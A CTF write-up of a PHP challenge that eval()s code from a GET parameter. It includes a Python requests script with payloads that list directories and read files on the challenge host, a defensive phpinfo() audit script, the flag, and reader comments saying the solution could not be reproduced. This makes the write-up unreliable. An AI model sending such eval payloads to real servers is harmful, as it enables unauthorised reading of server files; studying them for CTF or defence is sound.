Tags: web php

Rating: 2.0

This was a PHP challenge where the website would simply eval() the code you provided in the GET request.
At first I thought about using something like system or exec, but those functions and others like shell_exec were disabled.
We can verify that by executing phpinfo(); and checking the functions listed under disable_functions.
So running any clever system code or something like a shell was out of the question.
Also look out for open_basedir in the PHP configuration you get from phpinfo();. Luckily for us it was set to /, so we could explore the file system easily.

Using __DIR__ and scandir, we can quickly check which directory the website is running from. There was only index.php in /var/www/html.
In the / directory we find flag.so and flag.h (along with .dockerenv and start.sh); catting out flag.so (you can use highlight_file) will give the flag, as it was hardcoded in the binary.
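The two phpinfo() checks described above (disable_functions and open_basedir) are easy to automate. The following is an added example, not code from the original writeup: it parses the directive table in the form phpinfo() renders it and reports a configuration that still leaves command-execution or file-read functions enabled, or has open_basedir unset or set to /. The HTML sample is constructed, not captured from the challenge.

```python
import html
import re

# Constructed sample of the directive table that phpinfo() renders
# (columns: directive, local value, master value); not captured from the challenge.
SAMPLE_PHPINFO = """
<table>
<tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
<tr><td class="e">disable_functions</td><td class="v">system,exec,shell_exec,passthru</td><td class="v">system,exec,shell_exec,passthru</td></tr>
<tr><td class="e">open_basedir</td><td class="v">/</td><td class="v">/</td></tr>
</table>
"""

ROW_RE = re.compile(
    r'<tr><td class="e">([^<]+)</td><td class="v">(.*?)</td><td class="v">(.*?)</td></tr>', re.S)

# Functions that turn eval() of attacker input into command execution ...
EXEC_FUNCS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}
# ... or into a file read/listing primitive (what the writeup used to get the flag).
READ_FUNCS = {"highlight_file", "show_source", "file_get_contents", "readfile", "scandir"}


def parse_phpinfo_directives(page: str) -> dict:
    """Map directive name -> local value; phpinfo's '<i>no value</i>' becomes ''."""
    directives = {}
    for name, local, _master in ROW_RE.findall(page):
        value = html.unescape(re.sub(r"<[^>]+>", "", local)).strip()
        directives[name.strip()] = "" if value == "no value" else value
    return directives


def audit_php_hardening(directives: dict) -> list:
    """Return findings for an eval-exposed PHP host; an empty list means no obvious gap."""
    findings = []
    raw = directives.get("disable_functions", "")
    disabled = {f.strip() for f in raw.split(",") if f.strip()}
    still_exec = sorted(EXEC_FUNCS - disabled)
    if still_exec:
        findings.append("command execution still enabled: " + ", ".join(still_exec))
    still_read = sorted(READ_FUNCS - disabled)
    if still_read:
        findings.append("file read/listing still enabled: " + ", ".join(still_read))
    basedir = directives.get("open_basedir", "")
    if basedir in ("", "/"):
        findings.append("open_basedir %s: whole filesystem reachable"
                        % ("unset" if basedir == "" else "is /"))
    return findings
```

Run `audit_php_hardening(parse_phpinfo_directives(html_text))` on a saved phpinfo() page; the sample above reproduces the challenge's state, where popen/proc_open and every file-read function are still enabled and open_basedir is /.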

FLAG : flag{FFi_1s_qu1T3_DANg1ouS}

```python
import requests

url = "http://pwnable.org:19260"

# One payload at a time; the server eval()s whatever arrives in the `rh` parameter.
payload = """$f = scandir("/var/www/html");var_dump($f);"""
# payload = """echo $s = base64_encode(readfile("../../../flag.so"));"""
# payload = """$f = highlight_file('/start.sh');var_dump($f);"""

r = requests.Session()
print(payload)
print()
# Let requests URL-encode the payload instead of concatenating it into the query string.
s = r.get(url, params={"rh": payload})
final = s.text
print(final)
r.close()
```

DaviciiJune 29, 2020, 1:45 p.m.

The open_basedir is showing /var/www/http and not /. I also can't access the var or www dir through scandir. How did you get it? Can you give some more details please?

iqnoJune 29, 2020, 3:49 p.m.

Could you elaborate a bit more on how you were able to read outside of the /var/www/http directory? $t = scandir("/"); var_dump($t); evaluates to bool(false) as the www-data user presumably doesn't have the permissions to read anywhere except /var/www/http.
And as the previous comment mentions, the open_basedir is set to /var/www/html?

ScalpelJune 29, 2020, 5:28 p.m.

I think this might have been the unintended solution. I got the same solution, but only once. It was not reproducible, because all the other times I tried the / directory was empty. Only one time was I able to list the contents of the files in /.

There was a new challenge, noeasyphp, that was put up during the competition because of instability of easyphp.

IsopachJune 30, 2020, 8:42 a.m.

Your solution probably depended on someone else with a bypass trying to solve the challenge, which is why it doesn't work anymore.